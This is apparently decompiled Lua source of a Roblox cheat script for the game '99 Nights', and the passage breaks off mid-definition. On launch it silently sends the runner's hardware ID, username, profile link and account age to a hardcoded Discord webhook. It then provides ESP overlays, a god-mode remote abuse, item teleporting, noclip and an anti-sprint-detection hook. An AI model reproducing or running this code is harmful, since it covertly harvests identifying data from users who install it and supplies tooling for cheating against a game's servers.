-- filename: 
-- version: lua51
-- line: [0, 0] id: 0
function start()
  -- line: [0, 0] id: 1
  local r0_1 = clonefunction
  local r1_1 = game:GetService("HttpService")
  local r2_1 = r0_1(game.HttpGet)
  local r3_1 = r0_1(r1_1.JSONEncode)
  local r4_1 = r0_1(loadstring)
  local r5_1 = game:GetService("Players")
  local r6_1 = r5_1.LocalPlayer
  local r7_1 = game:GetService("Workspace").CurrentCamera
  local r8_1 = game:GetService("ReplicatedStorage")
  local r9_1 = game:GetService("RunService")
  local r10_1 = workspace.Map.Campground.MainFire.InnerTouchZone
  local r11_1 = workspace.Map.Campground.Scrapper.DashedLine
  local r12_1 = syn
  if r12_1 then
    r12_1 = r0_1(syn.request)
    if not r12_1 then
      ::label_52::
      r12_1 = http
      if r12_1 then
        r12_1 = r0_1(http.request)
        if not r12_1 then
          ::label_61::
          r12_1 = r0_1(http_request)
          if not r12_1 then
            r12_1 = fluxus
            if r12_1 then
              r12_1 = r0_1(fluxus.request) or r0_1(request)
            else
              goto label_75	-- block#7 is visited secondly
            end
          end
        end
      else
        goto label_61	-- block#4 is visited secondly
      end
    end
  else
    goto label_52	-- block#2 is visited secondly
  end
  local r13_1 = r12_1
  local r14_1 = {
    Url = "https://discord.com/api/webhooks/1405731801732874351/lZS_unNPEYMb7LQcTldHiAY70gprUn0oJcaUPDkC6XpyKzccS7MuvENDzB4Wj2mAdTZG",
    Method = "POST",
    Headers = {
      ["Content-type"] = "application/json",
    },
  }
  r14_1.Body = r3_1(r1_1, {
    content = "",
    embeds = {
      {
        title = "99 Nights",
        description = "",
        type = "rich",
        color = tonumber(8914952),
        fields = {
          {
            name = "Hardware ID:",
            value = game:GetService("RbxAnalyticsService"):GetClientId(),
            inline = true,
          },
          {
            name = "Profile:",
            value = "https://www.roblox.com/users/" .. r6_1.UserId .. "/profile",
            inline = true,
          },
          {
            name = "Username:",
            value = r6_1.Name,
            inline = true,
          },
          {
            name = "Account Age:",
            value = "Days: " .. r6_1.AccountAge,
            inline = true,
          }
        },
      }
    },
  })
  r13_1 = r13_1(r14_1)
  r12_1 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestBagStoreItem")
  r13_1 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestBagDropItem")
  r14_1 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestHotbarItem")
  local r15_1 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestConsumeItem")
  local function r16_1(r0_30)
    -- line: [0, 0] id: 30
    local r1_30, r2_30 = r7_1:WorldToViewportPoint(r0_30)
    return Vector2.new(r1_30.X, r1_30.Y), r2_30, r1_30.Z
  end
  local function r17_1(r0_85)
    -- line: [0, 0] id: 85
    local r1_85 = Drawing.new("Square")
    r1_85.Visible = false
    local r2_85 = nil	-- notice: implicit variable refs by block#[3]
    if r0_85 then
      r2_85 = r0_85.Color
      if not r2_85 then
        ::label_10::
        r2_85 = Color3.fromRGB(255, 255, 255)
      end
    else
      goto label_10	-- block#2 is visited secondly
    end
    r1_85.Color = r2_85
    r1_85.Transparency = 1
    r1_85.Thickness = 1
    r1_85.Filled = false
    return r1_85
  end
  local function r18_1(r0_80)
    -- line: [0, 0] id: 80
    local r1_80 = Drawing.new("Text")
    r1_80.Visible = false
    local r2_80 = nil	-- notice: implicit variable refs by block#[3]
    if r0_80 then
      r2_80 = r0_80.Color
      if not r2_80 then
        ::label_10::
        r2_80 = Color3.fromRGB(255, 255, 255)
      end
    else
      goto label_10	-- block#2 is visited secondly
    end
    r1_80.Color = r2_80
    r1_80.Transparency = 1
    r1_80.Font = 2
    r1_80.Center = true
    r2_80 = Color3.new(0, 0, 0)
    r1_80.OutlineColor = r2_80
    r1_80.Size = 15
    r1_80.Outline = true
    return r1_80
  end
  local function r19_1(r0_21)
    -- line: [0, 0] id: 21
    local r1_21 = Drawing.new("Circle")
    r1_21.Visible = false
    local r2_21 = nil	-- notice: implicit variable refs by block#[3]
    if r0_21 then
      r2_21 = r0_21.Color
      if not r2_21 then
        ::label_10::
        r2_21 = Color3.fromRGB(255, 255, 255)
      end
    else
      goto label_10	-- block#2 is visited secondly
    end
    r1_21.Color = r2_21
    r1_21.Transparency = 1
    r1_21.Thickness = 1
    r1_21.Filled = true
    r1_21.Radius = 2
    return r1_21
  end
  local function r20_1()
    -- line: [0, 0] id: 31
    if r6_1.Character and r6_1.Character:FindFirstChild("HumanoidRootPart") then
      return r6_1.Character.HumanoidRootPart
    end
  end
  local function r21_1(r0_56)
    -- line: [0, 0] id: 56
    -- notice: unreachable block#14
    local r1_56 = workspace.Map.Boundaries.Fog:FindFirstChild("Part")
    local r2_56 = r20_1()
    local r3_56 = nil
    local r4_56 = nil	-- notice: implicit variable refs by block#[15]
    if r0_56 and r1_56 then
      r4_56 = r1_56 and r2_56 and (r1_56.Position - r2_56.Position).Magnitude
      r3_56 = (r0_56.Position - r2_56.Position).Magnitude <= r4_56
    else
      r3_56 = nil
    end
    if r3_56 == true then
      r4_56 = true
      if not r4_56 then
        ::label_38::
        r4_56 = r3_56 == nil
      end
    else
      goto label_38	-- block#11 is visited secondly
    end
    return r4_56
  end
  local function r22_1(r0_89)
    -- line: [0, 0] id: 89
    for r4_89, r5_89 in pairs(r5_1.LocalPlayer.Inventory:GetChildren()) do
      if r5_89.Name:match(r0_89) then
        return r5_89
      end
    end
  end
  local function r23_1()
    -- line: [0, 0] id: 81
    for r3_81, r4_81 in pairs(r5_1.LocalPlayer.Inventory:GetChildren()) do
      if r4_81.Name:match("Sack") then
        return r4_81
      end
    end
  end
  local function r24_1(r0_55, r1_55)
    -- line: [0, 0] id: 55
    if r0_55.PrimaryPart and r21_1(r0_55.PrimaryPart) and not r0_55.Name:match("Chest") then
      game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestStartDraggingItem"):FireServer(unpack({
        r0_55
      }))
      task.wait()
      r0_55:SetPrimaryPartCFrame(r1_55)
      task.wait()
      if r0_55 then
        game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("StopDraggingItem"):FireServer(unpack({
          r0_55
        }))
      end
    end
  end
  local function r25_1(r0_57)
    -- line: [0, 0] id: 57
    if r0_57.PrimaryPart and r21_1(r0_57.PrimaryPart) then
      pcall(function()
        -- line: [0, 0] id: 58
        r14_1:InvokeServer(unpack({
          r0_57
        }))
      end)
    end
  end
  local function r26_1(r0_10)
    -- line: [0, 0] id: 10
    if r0_10.PrimaryPart and r21_1(r0_10.PrimaryPart) then
      r15_1:InvokeServer(unpack({
        r0_10
      }))
    end
  end
  local function r27_1()
    -- line: [0, 0] id: 35
    r8_1:WaitForChild("RemoteEvents"):WaitForChild("DamagePlayer"):FireServer(-math.huge)
  end
  local r28_1 = nil
  local function r29_1(r0_34)
    -- line: [0, 0] id: 34
    if r0_34 then
      if not r28_1 and r0_34 == r10_1.CFrame then
        r28_1 = r0_34
      end
      for r4_34, r5_34 in pairs(workspace.Items:GetChildren()) do
        if r5_34.Name ~= "Carrot" and r5_34.Name ~= "Berry" then
          local r6_34 = r24_1
          local r7_34 = r5_34
          local r8_34 = r28_1
          if r8_34 then
            r8_34 = r28_1 or r0_34
          else
            goto label_31	-- block#9 is visited secondly
          end
          r6_34(r7_34, r8_34)
        end
      end
    else
      local r1_34 = r20_1()
      if r1_34 then
        for r5_34, r6_34 in pairs(workspace.Items:GetChildren()) do
          if r6_34.Name ~= "Carrot" and r6_34.Name ~= "Berry" then
            r24_1(r6_34, r1_34.CFrame)
          end
        end
      end
    end
  end
  local function r30_1()
    -- line: [0, 0] id: 76
    for r3_76, r4_76 in pairs(workspace.Items:GetChildren()) do
      if r4_76.Name == "Log" or r4_76.Name == "Chair" then
        r24_1(r4_76, r11_1.CFrame + r11_1.CFrame.UpVector * 3)
      end
    end
  end
  local function r31_1()
    -- line: [0, 0] id: 9
    for r3_9, r4_9 in pairs(workspace.Items:GetChildren()) do
      if r4_9:GetAttribute("Scrappable") then
        r24_1(r4_9, r11_1.CFrame + r11_1.CFrame.UpVector * 3)
      end
    end
  end
  local function r32_1()
    -- line: [0, 0] id: 28
    if r20_1() then
      for r4_28, r5_28 in pairs(workspace.Items:GetChildren()) do
        if r5_28:GetAttribute("Interaction") == "Tool" then
          r25_1(r5_28)
        end
      end
    end
  end
  local function r33_1()
    -- line: [0, 0] id: 88
    if r20_1() then
      for r4_88, r5_88 in pairs(workspace.Items:GetChildren()) do
        if r5_88:GetAttribute("Interaction") == "Armour" then
          game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestEquipArmour"):InvokeServer(unpack({
            r5_88
          }))
        end
      end
    end
  end
  local function r34_1()
    -- line: [0, 0] id: 11
    if r20_1() then
      for r4_11, r5_11 in pairs(workspace.Items:GetChildren()) do
        if r5_11.Name:match("Ammo") then
          r26_1(r5_11)
        end
      end
    end
  end
  local function r35_1()
    -- line: [0, 0] id: 54
    if r20_1() then
      for r4_54, r5_54 in pairs(workspace.Items:GetChildren()) do
        if r5_54.Name == "Coin Stack" and r5_54.PrimaryPart then
          game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestCollectCoints"):InvokeServer(unpack({
            r5_54
          }))
        end
      end
    end
  end
  local function r36_1()
    -- line: [0, 0] id: 19
    if r20_1() then
      for r4_19, r5_19 in pairs(workspace.Items:GetChildren()) do
        if r5_19.Name == "Diamond" and r5_19.PrimaryPart then
          game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestTakeDiamonds"):FireServer(unpack({
            r5_19
          }))
        end
      end
    end
  end
  local function r37_1()
    -- line: [0, 0] id: 14
    local r0_14 = r20_1()
    local r1_14 = r23_1()
    if r0_14 then
      for r5_14, r6_14 in pairs(workspace.Characters:GetChildren()) do
        if r6_14.Name:match("Lost Child") and r6_14:GetAttribute("Lost") then
          local r7_14 = r6_14:FindFirstChild("ProximityInteraction", true)
          if r7_14 then
            fireproximityprompt(r7_14)
          end
          task.wait()
          r6_14:SetPrimaryPartCFrame(r10_1.CFrame + r10_1.CFrame.UpVector * 5 + r10_1.CFrame.RightVector * -20)
          task.wait()
          game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("RequestBagDropItem"):FireServer(unpack({
            r1_14,
            r6_14
          }))
        end
      end
    end
  end
  local function r38_1()
    -- line: [0, 0] id: 90
    if r20_1() then
      for r4_90, r5_90 in pairs(workspace.Items:GetChildren()) do
        local r6_90 = false
        local function r7_90()
          -- line: [0, 0] id: 91
          r6_90 = true
        end
        if r5_90:GetAttribute("RestoreHunger") and not r5_90:GetAttribute("RestoreHealth") then
          if r6_1:GetAttribute("Hunger") >= 200 then
            r7_90()
          end
          r26_1(r5_90)
        end
        if r6_90 then
          -- close: r1_90
          break
        else
          -- close: r6_90
        end
      end
    end
  end
  local function r39_1(r0_67)
    -- line: [0, 0] id: 67
    local r1_67 = r0_67:FindFirstChild("ProximityInteraction", true)
    if r1_67 then
      fireproximityprompt(r1_67)
    end
  end
  local function r40_1()
    -- line: [0, 0] id: 29
    for r3_29, r4_29 in pairs(workspace.Items:GetChildren()) do
      if r4_29.Name:match("Chest") then
        r39_1(r4_29)
      end
    end
  end
  local function r41_1()
    -- line: [0, 0] id: 72
    local r0_72 = r20_1()
    if r0_72 then
      r0_72.CFrame = r10_1.CFrame + r10_1.CFrame.UpVector * 5
    end
  end
  local function r42_1()
    -- line: [0, 0] id: 46
    local r0_46 = r20_1()
    if r0_46 and workspace.Map.Landmarks:FindFirstChild("Stronghold") and workspace.Map.Landmarks.Stronghold:FindFirstChild("Sign", true) then
      r0_46.CFrame = workspace.Map.Landmarks.Stronghold:FindFirstChild("Sign", true):GetPivot()
    end
  end
  local function r43_1()
    -- line: [0, 0] id: 24
    local r0_24 = r20_1()
    if r0_24 then
      for r4_24, r5_24 in pairs(workspace.Characters:GetChildren()) do
        if r5_24.Name:match("Lost Child") and r5_24:GetAttribute("Lost") then
          r0_24.CFrame = r5_24.HumanoidRootPart.CFrame + r5_24.HumanoidRootPart.CFrame.UpVector * 5
        end
      end
    end
  end
  local function r44_1()
    -- line: [0, 0] id: 20
    local r0_20 = r20_1()
    if r0_20 then
      for r4_20, r5_20 in pairs(workspace.Map.Landmarks:GetChildren()) do
        if r5_20.PrimaryPart and r5_20.Name:match("Small Tree") and r21_1(r5_20.PrimaryPart) then
          r5_20:SetPrimaryPartCFrame(r0_20:GetPivot() + r0_20:GetPivot().LookVector * 5)
        end
      end
    end
  end
  local r45_1 = {
    bypsSprint,
    noClipping
  }
  local function r46_1(r0_73)
    -- line: [0, 0] id: 73
    local r1_73 = {
      box = r17_1(r45_1.PlayersEsp),
    }
    local r2_73 = {
      name = r18_1(r45_1.PlayersEsp),
    }
    local r3_73 = nil
    r3_73 = r9_1.RenderStepped:Connect(function()
      -- line: [0, 0] id: 74
      if r45_1.PlayersEsp.Enabled and r0_73.Character and r0_73.Character:FindFirstChildOfClass("Humanoid") and r0_73.Character:FindFirstChild("Head") and r0_73.Character:FindFirstChild("HumanoidRootPart") and 0 < r0_73.Character:FindFirstChildOfClass("Humanoid").Health then
        local r0_74 = r0_73.Character and r0_73.Character:FindFirstChild("HumanoidRootPart")
        local r1_74 = r0_73.Character and r0_73.Character:FindFirstChild("Head")
        local r2_74, r3_74, r4_74 = r16_1(r0_74.Position)
        local r5_74 = r1_74 and r16_1(r1_74.Position + Vector3.new(0, 0.5, 0))
        local r6_74 = r0_74 and r16_1(r0_74.Position - Vector3.new(0, 3, 0))
        if r3_74 then
          r1_73.box.Size = Vector2.new(1000 / r4_74, r5_74.Y - r6_74.Y)
          r1_73.box.Position = Vector2.new(r2_74.X - r1_73.box.Size.X / 2, r2_74.Y - r1_73.box.Size.Y / 2)
          r2_73.name.Text = r0_73.Name
          r2_73.name.Position = Vector2.new(r1_73.box.Position.X + r1_73.box.Size.X / 2, r1_73.box.Position.Y + r1_73.box.Size.Y - 20)
          r1_73.box.Color = r45_1.PlayersEsp.Color
          r2_73.name.Color = r45_1.PlayersEsp.Color
          r1_73.box.Visible = true
          r2_73.name.Visible = true
        else
          r1_73.box.Visible = false
          r2_73.name.Visible = false
        end
      else
        r1_73.box.Visible = false
        r2_73.name.Visible = false
      end
    end)
    r5_1.PlayerRemoving:Connect(function(r0_75)
      -- line: [0, 0] id: 75
      if r0_75 == r0_73 then
        for r4_75, r5_75 in pairs(r1_73) do
          if r5_75 and r5_75.Remove then
            r5_75:Remove()
          end
        end
        for r4_75, r5_75 in pairs(r2_73) do
          if r5_75 and r5_75.Remove then
            r5_75:Remove()
          end
        end
        if r3_73 then
          r3_73:Disconnect()
          r3_73 = nil
        end
      end
    end)
  end
  for r50_1, r51_1 in pairs(r5_1:GetPlayers()) do
    if r51_1 ~= r6_1 then
      r46_1(r51_1)
    end
  end
  r5_1.PlayerAdded:Connect(r46_1)
  local function r47_1(r0_63)
    -- line: [0, 0] id: 63
    local r1_63 = r0_63:GetAttribute("Interaction")
    local r2_63 = {
      circle = r19_1(),
    }
    local r3_63 = {
      name = r18_1(),
      info = r18_1(),
    }
    local function r4_63(r0_65)
      -- line: [0, 0] id: 65
      if r0_65 then
        local r1_65 = nil
        local r2_65 = nil
        if r0_63.PrimaryPart then
          r1_65, r2_65 = r16_1(r0_63.PrimaryPart.Position)
        end
        if r2_65 then
          r2_63.circle.Position = r1_65
          r3_63.name.Position = Vector2.new(r2_63.circle.Position.X, r2_63.circle.Position.Y - 20)
          r3_63.info.Position = Vector2.new(r2_63.circle.Position.X, r2_63.circle.Position.Y - 35)
          r3_63.name.Text = r0_63.Name
          r2_63.circle.Color = r0_63.PrimaryPart.Color
          r3_63.name.Color = r0_63.PrimaryPart.Color
          r3_63.info.Color = r0_63.PrimaryPart.Color
          r2_63.circle.Visible = true
          r3_63.name.Visible = true
          r3_63.info.Visible = true
        else
          r2_63.circle.Visible = false
          r3_63.name.Visible = false
          r3_63.info.Visible = false
        end
      else
        r2_63.circle.Visible = false
        r3_63.name.Visible = false
        r3_63.info.Visible = false
      end
    end
    local r5_63 = nil
    r5_63 = r9_1.RenderStepped:Connect(function()
      -- line: [0, 0] id: 66
      if r1_63 == "Item" then
        r4_63(r45_1.ItemsEsp)
      elseif r1_63 == "Tool" then
        r4_63(r45_1.ToolsEsp)
      elseif r1_63 == "ItemChest" then
        r4_63(r45_1.ChestsEsp)
      elseif r1_63 == "Currency" then
        r4_63(r45_1.CurrenciesEsp)
      elseif r1_63 == "Armour" then
        r4_63(r45_1.ArmoursEsp)
      end
    end)
    r0_63.Parent.ChildRemoved:Connect(function(r0_64)
      -- line: [0, 0] id: 64
      if r0_64 == r0_63 then
        for r4_64, r5_64 in pairs(r2_63) do
          if r5_64 and r5_64.Remove then
            r5_64:Remove()
          end
        end
        for r4_64, r5_64 in pairs(r3_63) do
          if r5_64 and r5_64.Remove then
            r5_64:Remove()
          end
        end
        if r5_63 then
          r5_63:Disconnect()
          r5_63 = nil
        end
      end
    end)
  end
  spawn(function()
    -- line: [0, 0] id: 5
    repeat
      task.wait()
    until workspace:FindFirstChild("Items")
    workspace.Items.ChildAdded:Connect(function(r0_6)
      -- line: [0, 0] id: 6
      r47_1(r0_6)
    end)
    for r3_5, r4_5 in pairs(workspace.Items:GetChildren()) do
      r47_1(r4_5)
    end
  end)
  local function r48_1(r0_77)
    -- line: [0, 0] id: 77
    local r1_77 = {
      circle = r19_1(),
    }
    local r2_77 = {
      name = r18_1(),
      info = r18_1(),
    }
    local r3_77 = nil
    r3_77 = r9_1.RenderStepped:Connect(function()
      -- line: [0, 0] id: 79
      if r45_1.NpcsEsp.Enabled then
        local r0_79 = nil
        local r1_79 = nil
        if r0_77.PrimaryPart then
          r0_79, r1_79 = r16_1(r0_77.PrimaryPart.Position)
        end
        if r1_79 then
          r1_77.circle.Position = r0_79
          r2_77.name.Position = Vector2.new(r1_77.circle.Position.X, r1_77.circle.Position.Y - 20)
          r2_77.info.Position = Vector2.new(r1_77.circle.Position.X, r1_77.circle.Position.Y - 35)
          r2_77.name.Text = r0_77.Name
          if r0_77.Name == "Bunny" then
            r1_77.circle.Color = r45_1.NpcsEsp.BunniesEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.BunniesEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.BunniesEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name == "Wolf" then
            r1_77.circle.Color = r45_1.NpcsEsp.WolfsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.WolfsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.WolfsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name == "Alpha Wolf" then
            r1_77.circle.Color = r45_1.NpcsEsp.AWolfsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.AWolfsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.AWolfsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name == "Bear" then
            r1_77.circle.Color = r45_1.NpcsEsp.BearsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.BearsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.BearsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name == "Arctic Fox" then
            r1_77.circle.Color = r45_1.NpcsEsp.ArcFoxsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.ArcFoxsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.ArcFoxsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name == "Polar Bear" then
            r1_77.circle.Color = r45_1.NpcsEsp.PolBearsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.PolBearsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.PolBearsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name:match("Lost Child") then
            r1_77.circle.Color = r45_1.NpcsEsp.LChildsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.LChildsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.LChildsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name:match("Cultist") then
            r1_77.circle.Color = r45_1.NpcsEsp.CultistsEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.CultistsEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.CultistsEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          elseif r0_77.Name:match("Trader") then
            r1_77.circle.Color = r45_1.NpcsEsp.TradersEsp.Color
            r2_77.name.Color = r45_1.NpcsEsp.TradersEsp.Color
            r2_77.info.Color = r45_1.NpcsEsp.TradersEsp.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          else
            r1_77.circle.Color = r0_77.PrimaryPart.Color
            r2_77.name.Color = r0_77.PrimaryPart.Color
            r2_77.info.Color = r0_77.PrimaryPart.Color
            r1_77.circle.Visible = true
            r2_77.name.Visible = true
            r2_77.info.Visible = true
          end
        else
          r1_77.circle.Visible = false
          r2_77.name.Visible = false
          r2_77.info.Visible = false
        end
      else
        r1_77.circle.Visible = false
        r2_77.name.Visible = false
        r2_77.info.Visible = false
      end
    end)
    r0_77.Parent.ChildRemoved:Connect(function(r0_78)
      -- line: [0, 0] id: 78
      if r0_78 == r0_77 then
        for r4_78, r5_78 in pairs(r1_77) do
          if r5_78 and r5_78.Remove then
            r5_78:Remove()
          end
        end
        for r4_78, r5_78 in pairs(r2_77) do
          if r5_78 and r5_78.Remove then
            r5_78:Remove()
          end
        end
        if r3_77 then
          r3_77:Disconnect()
          r3_77 = nil
        end
      end
    end)
  end
  spawn(function()
    -- line: [0, 0] id: 22
    repeat
      task.wait()
    until workspace:FindFirstChild("Characters")
    workspace.Characters.ChildAdded:Connect(function(r0_23)
      -- line: [0, 0] id: 23
      r48_1(r0_23)
    end)
    for r3_22, r4_22 in pairs(workspace.Characters:GetChildren()) do
      r48_1(r4_22)
    end
  end)
  local r49_1 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvents"):WaitForChild("PlayerSprinting")
  local r50_1 = nil
  r50_1 = hookmetamethod(game, "__namecall", function(r0_82, ...)
    -- line: [0, 0] id: 82
    local r2_82 = getnamecallmethod():lower()
    if r45_1.bypsSprint and r0_82 == r49_1 and r2_82 == "fireserver" then
      return 
    end
    return r50_1(r0_82, ...)
  end)
  local r51_1 = nil
  local r52_1 = nil
  local function r53_1(r0_37, r1_37)
    -- line: [0, 0] id: 37
    local r2_37 = nil	-- notice: implicit variable refs by block#[10, 11, 12, 13]
    if r0_37 then
      r2_37 = r51_1
      if r2_37 then
        r51_1:Disconnect()
        r2_37 = nil
        r51_1 = r2_37
      end
      r2_37 = r52_1
      if r2_37 then
        r52_1:Disconnect()
        r2_37 = nil
        r52_1 = r2_37
      end
      r2_37 = r6_1.Character
      if r2_37 then
        if not r2_37:FindFirstChildOfClass("Humanoid") then
          repeat
            task.wait()
          until r2_37:FindFirstChildOfClass("Humanoid")
        end
        r51_1 = r2_37:FindFirstChildOfClass("Humanoid"):GetPropertyChangedSignal("WalkSpeed"):Connect(function()
          -- line: [0, 0] id: 38
          r2_37:FindFirstChildOfClass("Humanoid").WalkSpeed = r1_37
        end)
        r2_37:FindFirstChildOfClass("Humanoid").WalkSpeed = r1_37
      end
      r52_1 = r6_1.CharacterAdded:Connect(function(r0_39)
        -- line: [0, 0] id: 39
        if r51_1 then
          r51_1:Disconnect()
          r51_1 = nil
        end
        if not r0_39:FindFirstChildOfClass("Humanoid") then
          repeat
            task.wait()
          until r0_39:FindFirstChildOfClass("Humanoid")
        end
        r51_1 = r0_39:FindFirstChildOfClass("Humanoid"):GetPropertyChangedSignal("WalkSpeed"):Connect(function()
          -- line: [0, 0] id: 40
          r0_39:FindFirstChildOfClass("Humanoid").WalkSpeed = r1_37
        end)
        r0_39:FindFirstChildOfClass("Humanoid").WalkSpeed = r1_37
      end)
      -- close: r2_37
    else
      r2_37 = r51_1
      if r2_37 then
        r2_37 = r51_1
        r2_37:Disconnect()
        r2_37 = nil
        r51_1 = r2_37
      end
      r2_37 = r52_1
      if r2_37 then
        r2_37 = r52_1
        r2_37:Disconnect()
        r2_37 = nil
        r52_1 = r2_37
      end
    end
  end
  local r54_1 = nil
  local r55_1 = nil
  spawn(function()
    -- line: [0, 0] id: 17
    while task.wait() do
      local r0_17 = r45_1.noClipping
      if r0_17 then
        r0_17 = r54_1
        if r0_17 then
          r54_1:Disconnect()
          r0_17 = nil
          r54_1 = r0_17
        end
        r55_1 = false
        function r0_17()
          -- line: [0, 0] id: 18
          if r55_1 == false and r6_1.Character ~= nil then
            for r3_18, r4_18 in pairs(r6_1.Character:GetDescendants()) do
              if r4_18:IsA("BasePart") and r4_18.CanCollide and r4_18.Name ~= floatName then
                r4_18.CanCollide = false
              end
            end
          end
        end
        r54_1 = game:GetService("RunService").Stepped:Connect(r0_17)
      else
        r0_17 = r54_1
        if r0_17 then
          r54_1:Disconnect()
          r0_17 = nil
          r54_1 = r0_17
        end
        r0_17 = true
        r55_1 = r0_17
      end
    end
  end)
  local r57_1 = Library:CreateWindow({
    Name = "99 Nights",
    Credit = "by Wayfer",
    SaveConfig = true,
    ConfigFolder = "Wayfer",
  })
  local r58_1 = r57_1:CreateTab({
    Name = "Combat",
    Icon = "rbxassetid://96918908092798",
  })
  local r59_1 = r57_1:CreateTab({
    Name = "Player",
    Icon = "rbxassetid://76459810928876",
  })
  local r60_1 = r57_1:CreateTab({
    Name = "Esp",
    Icon = "rbxassetid://90186710841083",
  })
  local r61_1 = r57_1:CreateTab({
    Name = "Teleport",
    Icon = "rbxassetid://85267565833509",
  })
  local r62_1 = r57_1:CreateTab({
    Name = "Info",
    Icon = "rbxassetid://100153863906288",
  })
  local r63_1 = r57_1:CreateTab({
    Name = "Settings",
    Icon = "rbxassetid://120826427746593",
  })
  r60_1:CreateSection({
    Name = "Esp",
  })
  r60_1:CreateToler({
    Name = "Players",
    Default = true,
    Save = true,
    Flag = "PlayersEsp",
    Color = r45_1.PlayersEsp.Color,
    Callback = function(r0_25, r1_25)
      -- line: [0, 0] id: 25
      r45_1.PlayersEsp.Enabled = r0_25
      r45_1.PlayersEsp.Color = r1_25
    end,
  })
  r60_1:CreateToggle({
    Name = "Npcs",
    Default = true,
    Save = true,
    Flag = "NpcsEsp",
    Callback = function(r0_69)
      -- line: [0, 0] id: 69
      r45_1.NpcsEsp.Enabled = r0_69
    end,
  })
  r60_1:CreateToggle({
    Name = "Items",
    Default = true,
    Save = true,
    Flag = "ItemsEsp",
    Callback = function(r0_32)
      -- line: [0, 0] id: 32
      r45_1.ItemsEsp = r0_32
    end,
  })
  r60_1:CreateToggle({
    Name = "Tools",
    Default = true,
    Save = true,
    Flag = "ToolsEsp",
    Callback = function(r0_50)
      -- line: [0, 0] id: 50
      r45_1.ToolsEsp = r0_50
    end,
  })
  r60_1:CreateToggle({
    Name = "Chests",
    Default = true,
    Save = true,
    Flag = "ChestsEsp",
    Callback = function(r0_47)
      -- line: [0, 0] id: 47
      r45_1.ChestsEsp = r0_47
    end,
  })
  r60_1:CreateToggle({
    Name = "Currencies",
    Default = true,
    Save = true,
    Flag = "CurrenciesEsp",
    Callback = function(r0_33)
      -- line: [0, 0] id: 33
      r45_1.CurrenciesEsp = r0_33
    end,
  })
  r60_1:CreateToggle({
    Name = "Armours",
    Default = true,
    Save = true,
    Flag = "ArmoursEsp",
    Callback = function(r0_45)
      -- line: [0, 0] id: 45
      r45_1.ArmoursEsp = r0_45
    end,
  })
  r58_1:CreateButton({
    Name = "God Mode",
    Callback = function()
      -- line: [0, 0] id: 86
      r27_1()
    end,
  })
  r58_1:CreateButton({
    Name = "Bring All Trees",
    Callback = function()
      -- line: [0, 0] id: 12
      r44_1()
    end,
  })
  local r64_1 = "Camp"
  r58_1:CreateDropdown({
    Name = "Collect Items to",
    Options = {
      Me = "Me",
      Camp = "Camp",
    },
    Default = "Camp",
    Callback = function(r0_44)
      -- line: [0, 0] id: 44
      r64_1 = r0_44
    end,
  })
  r58_1:CreateButton({
    Name = "Collect Items",
    Callback = function()
      -- line: [0, 0] id: 36
      if r64_1 == "Me" then
        r29_1()
      elseif r64_1 == "Camp" then
        r29_1(r10_1.CFrame + r10_1.CFrame.UpVector * 5 + r10_1.CFrame.RightVector * -20)
      end
    end,
  })
  r58_1:CreateButton({
    Name = "Put Woods in Scrapper",
    Callback = function()
      -- line: [0, 0] id: 15
      r30_1()
    end,
  })
  r58_1:CreateButton({
    Name = "Put Scraps in Scrapper",
    Callback = function()
      -- line: [0, 0] id: 60
      r31_1()
    end,
  })
  r58_1:CreateSection({
    Name = "Chests",
  })
  r58_1:CreateButton({
    Name = "Open Chests",
    Callback = function()
      -- line: [0, 0] id: 68
      r40_1()
    end,
  })
  r58_1:CreateToggle({
    Name = "Auto Open Chests",
    Default = true,
    Save = true,
    Flag = "AutoOpenChests",
    Callback = function(r0_3)
      -- line: [0, 0] id: 3
      r45_1.AutoOpenChests = r0_3
      task.spawn(function()
        -- line: [0, 0] id: 4
        while r45_1.AutoOpenChests do
          r40_1()
          task.wait(0.1)
        end
      end)
    end,
  })
  r58_1:CreateSection({
